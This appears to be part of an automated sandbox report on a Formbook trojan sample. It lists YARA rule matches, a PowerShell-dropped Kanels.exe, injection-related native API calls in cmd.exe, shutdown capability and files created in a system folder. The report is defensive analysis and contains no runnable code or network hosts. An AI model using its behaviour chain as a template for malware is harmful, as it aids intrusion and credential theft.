Source: 0000000C.00000002.2877363620.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.2880110378.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.2526300965.0000000022FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.2524616734.0000000022980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2877853079.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2877768736.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2878696007.0000000003000000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Kanels.exe Jump to dropped file
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12B60 NtClose,LdrInitializeThunk, 7_2_22D12B60
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12C70 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_22D12C70
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12DF0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_22D12DF0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D135C0 NtCreateMutant,LdrInitializeThunk, 7_2_22D135C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D14340 NtSetContextThread, 7_2_22D14340
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D14650 NtSuspendThread, 7_2_22D14650
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12AD0 NtReadFile, 7_2_22D12AD0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12AF0 NtWriteFile, 7_2_22D12AF0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12AB0 NtWaitForSingleObject, 7_2_22D12AB0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12BF0 NtAllocateVirtualMemory, 7_2_22D12BF0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12BE0 NtQueryValueKey, 7_2_22D12BE0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12B80 NtQueryInformationFile, 7_2_22D12B80
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12BA0 NtEnumerateValueKey, 7_2_22D12BA0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12EE0 NtQueueApcThread, 7_2_22D12EE0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12E80 NtReadVirtualMemory, 7_2_22D12E80
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12EA0 NtAdjustPrivilegesToken, 7_2_22D12EA0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12E30 NtWriteVirtualMemory, 7_2_22D12E30
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12FE0 NtCreateFile, 7_2_22D12FE0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12F90 NtProtectVirtualMemory, 7_2_22D12F90
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12FB0 NtResumeThread, 7_2_22D12FB0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12FA0 NtQuerySection, 7_2_22D12FA0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12F60 NtCreateProcessEx, 7_2_22D12F60
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12F30 NtCreateSection, 7_2_22D12F30
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12CC0 NtQueryVirtualMemory, 7_2_22D12CC0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12CF0 NtOpenProcess, 7_2_22D12CF0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12CA0 NtQueryInformationToken, 7_2_22D12CA0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12C60 NtCreateKey, 7_2_22D12C60
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12C00 NtQueryInformationProcess, 7_2_22D12C00
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12DD0 NtDelayExecution, 7_2_22D12DD0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12DB0 NtEnumerateKey, 7_2_22D12DB0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12D10 NtMapViewOfSection, 7_2_22D12D10
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12D00 NtSetInformationFile, 7_2_22D12D00
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12D30 NtUnmapViewOfSection, 7_2_22D12D30
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D13090 NtSetValueKey, 7_2_22D13090
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D13010 NtOpenDirectoryObject, 7_2_22D13010
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D139B0 NtGetContextThread, 7_2_22D139B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03784340 NtSetContextThread,LdrInitializeThunk, 12_2_03784340
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03784650 NtSuspendThread,LdrInitializeThunk, 12_2_03784650
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782B60 NtClose,LdrInitializeThunk, 12_2_03782B60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782AF0 NtWriteFile,LdrInitializeThunk, 12_2_03782AF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782AD0 NtReadFile,LdrInitializeThunk, 12_2_03782AD0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782F30 NtCreateSection,LdrInitializeThunk, 12_2_03782F30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782FE0 NtCreateFile,LdrInitializeThunk, 12_2_03782FE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782FB0 NtResumeThread,LdrInitializeThunk, 12_2_03782FB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782EE0 NtQueueApcThread,LdrInitializeThunk, 12_2_03782EE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782D30 NtUnmapViewOfSection,LdrInitializeThunk, 12_2_03782D30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782D10 NtMapViewOfSection,LdrInitializeThunk, 12_2_03782D10
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782DF0 NtQuerySystemInformation,LdrInitializeThunk, 12_2_03782DF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782DD0 NtDelayExecution,LdrInitializeThunk, 12_2_03782DD0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782C70 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_03782C70
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782C60 NtCreateKey,LdrInitializeThunk, 12_2_03782C60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782CA0 NtQueryInformationToken,LdrInitializeThunk, 12_2_03782CA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037835C0 NtCreateMutant,LdrInitializeThunk, 12_2_037835C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037839B0 NtGetContextThread,LdrInitializeThunk, 12_2_037839B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782BF0 NtAllocateVirtualMemory, 12_2_03782BF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782BE0 NtQueryValueKey, 12_2_03782BE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782BA0 NtEnumerateValueKey, 12_2_03782BA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782B80 NtQueryInformationFile, 12_2_03782B80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782AB0 NtWaitForSingleObject, 12_2_03782AB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782F60 NtCreateProcessEx, 12_2_03782F60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782FA0 NtQuerySection, 12_2_03782FA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782F90 NtProtectVirtualMemory, 12_2_03782F90
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782E30 NtWriteVirtualMemory, 12_2_03782E30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782EA0 NtAdjustPrivilegesToken, 12_2_03782EA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782E80 NtReadVirtualMemory, 12_2_03782E80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782D00 NtSetInformationFile, 12_2_03782D00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782DB0 NtEnumerateKey, 12_2_03782DB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782C00 NtQueryInformationProcess, 12_2_03782C00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782CF0 NtOpenProcess, 12_2_03782CF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782CC0 NtQueryVirtualMemory, 12_2_03782CC0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03783010 NtOpenDirectoryObject, 12_2_03783010
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03783090 NtSetValueKey, 12_2_03783090
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03783D70 NtOpenThread, 12_2_03783D70
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03783D10 NtOpenProcessToken, 12_2_03783D10
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D27730 NtCreateFile, 12_2_02D27730
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D27A10 NtClose, 12_2_02D27A10
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D27890 NtReadFile, 12_2_02D27890
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D27970 NtDeleteFile, 12_2_02D27970
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403373
Creates files inside the system directory
Source: C:\Users\user\Desktop\16042024124521.exe File created: C:\Windows\resources\0809 Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe File created: C:\Windows\resources\0809\chlorinity Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe File created: C:\Windows\resources\0809\chlorinity\Maengdelaere Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_00404C62 0_2_00404C62
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_00406ADD 0_2_00406ADD
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_004072B4 0_2_004072B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_02E6F108 1_2_02E6F108
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_02E6F9D8 1_2_02E6F9D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_02E6EDC0 1_2_02E6EDC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_07388978 1_2_07388978
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0738B360 1_2_0738B360
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D602C0 7_2_22D602C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D80274 7_2_22D80274
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA03E6 7_2_22DA03E6
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CEE3F0 7_2_22CEE3F0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9A352 7_2_22D9A352
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D72000 7_2_22D72000
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D981CC 7_2_22D981CC
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA01AA 7_2_22DA01AA
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D941A2 7_2_22D941A2
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D68158 7_2_22D68158
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD0100 7_2_22CD0100
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7A118 7_2_22D7A118
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFC6E0 7_2_22CFC6E0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDC7C0 7_2_22CDC7C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D04750 7_2_22D04750
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0770 7_2_22CE0770
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D8E4F6 7_2_22D8E4F6
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D92446 7_2_22D92446
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D84420 7_2_22D84420
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA0591 7_2_22DA0591
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0535 7_2_22CE0535
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDEA80 7_2_22CDEA80
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D96BD7 7_2_22D96BD7
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9AB40 7_2_22D9AB40
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0E8F0 7_2_22D0E8F0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CC68B8 7_2_22CC68B8
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE2840 7_2_22CE2840
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CEA840 7_2_22CEA840
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE29A0 7_2_22CE29A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DAA9A6 7_2_22DAA9A6
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF6962 7_2_22CF6962
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9EEDB 7_2_22D9EEDB
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9CE93 7_2_22D9CE93
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF2E90 7_2_22CF2E90
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0E59 7_2_22CE0E59
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9EE26 7_2_22D9EE26
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD2FC8 7_2_22CD2FC8
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CECFE0 7_2_22CECFE0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5EFA0 7_2_22D5EFA0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D54F40 7_2_22D54F40
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D00F30 7_2_22D00F30
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D82F30 7_2_22D82F30
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D22F28 7_2_22D22F28
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD0CF2 7_2_22CD0CF2
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D80CB5 7_2_22D80CB5
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0C00 7_2_22CE0C00
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDADE0 7_2_22CDADE0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF8DBF 7_2_22CF8DBF
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7CD1F 7_2_22D7CD1F
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CEAD00 7_2_22CEAD00
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFB2C0 7_2_22CFB2C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D812ED 7_2_22D812ED
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFD2F0 7_2_22CFD2F0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE52A0 7_2_22CE52A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D2739A 7_2_22D2739A
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCD34C 7_2_22CCD34C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9132D 7_2_22D9132D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE70C0 7_2_22CE70C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D8F0CC 7_2_22D8F0CC
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D970E9 7_2_22D970E9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9F0E0 7_2_22D9F0E0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CEB1B0 7_2_22CEB1B0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DAB16B 7_2_22DAB16B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D1516C 7_2_22D1516C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCF172 7_2_22CCF172
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D916CC 7_2_22D916CC
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D25630 7_2_22D25630
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9F7B0 7_2_22D9F7B0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD1460 7_2_22CD1460
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9F43F 7_2_22D9F43F
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA95C3 7_2_22DA95C3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7D5B0 7_2_22D7D5B0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D97571 7_2_22D97571
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D8DAC6 7_2_22D8DAC6
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D25AA0 7_2_22D25AA0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7DAAC 7_2_22D7DAAC
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D81AA3 7_2_22D81AA3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9FA49 7_2_22D9FA49
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D97A46 7_2_22D97A46
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D53A6C 7_2_22D53A6C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D55BF0 7_2_22D55BF0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D1DBF9 7_2_22D1DBF9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFFB80 7_2_22CFFB80
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9FB76 7_2_22D9FB76
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE38E0 7_2_22CE38E0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4D800 7_2_22D4D800
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE9950 7_2_22CE9950
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFB950 7_2_22CFB950
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D75910 7_2_22D75910
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE9EB0 7_2_22CE9EB0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CA3FD2 7_2_22CA3FD2
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CA3FD5 7_2_22CA3FD5
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE1F92 7_2_22CE1F92
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9FFB1 7_2_22D9FFB1
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9FF09 7_2_22D9FF09
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9FCF2 7_2_22D9FCF2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_038103E6 12_2_038103E6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0375E3F0 12_2_0375E3F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0380A352 12_2_0380A352
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037F0274 12_2_037F0274
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037D02C0 12_2_037D02C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_038041A2 12_2_038041A2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037D8158 12_2_037D8158
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_038101AA 12_2_038101AA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_038081CC 12_2_038081CC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037EA118 12_2_037EA118
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03740100 12_2_03740100
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037E2000 12_2_037E2000
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03750770 12_2_03750770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03774750 12_2_03774750
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0374C7C0 12_2_0374C7C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0376C6E0 12_2_0376C6E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03810591 12_2_03810591
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03750535 12_2_03750535
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037F4420 12_2_037F4420
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037FE4F6 12_2_037FE4F6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03802446 12_2_03802446
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03806BD7 12_2_03806BD7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0380AB40 12_2_0380AB40
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0374EA80 12_2_0374EA80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03766962 12_2_03766962
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0381A9A6 12_2_0381A9A6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037529A0 12_2_037529A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03752840 12_2_03752840
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0375A840 12_2_0375A840
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0377E8F0 12_2_0377E8F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037368B8 12_2_037368B8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037C4F40 12_2_037C4F40
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03770F30 12_2_03770F30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037F2F30 12_2_037F2F30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03792F28 12_2_03792F28
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03742FC8 12_2_03742FC8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037CEFA0 12_2_037CEFA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0380CE93 12_2_0380CE93
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03750E59 12_2_03750E59
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0380EEDB 12_2_0380EEDB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0380EE26 12_2_0380EE26
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03762E90 12_2_03762E90
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037ECD1F 12_2_037ECD1F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0375AD00 12_2_0375AD00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0374ADE0 12_2_0374ADE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03768DBF 12_2_03768DBF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03750C00 12_2_03750C00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03740CF2 12_2_03740CF2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037F0CB5 12_2_037F0CB5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0373D34C 12_2_0373D34C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0380132D 12_2_0380132D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0379739A 12_2_0379739A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0376D2F0 12_2_0376D2F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037F12ED 12_2_037F12ED
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0376B2C0 12_2_0376B2C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037552A0 12_2_037552A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0373F172 12_2_0373F172
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0378516C 12_2_0378516C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0375B1B0 12_2_0375B1B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0381B16B 12_2_0381B16B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0380F0E0 12_2_0380F0E0
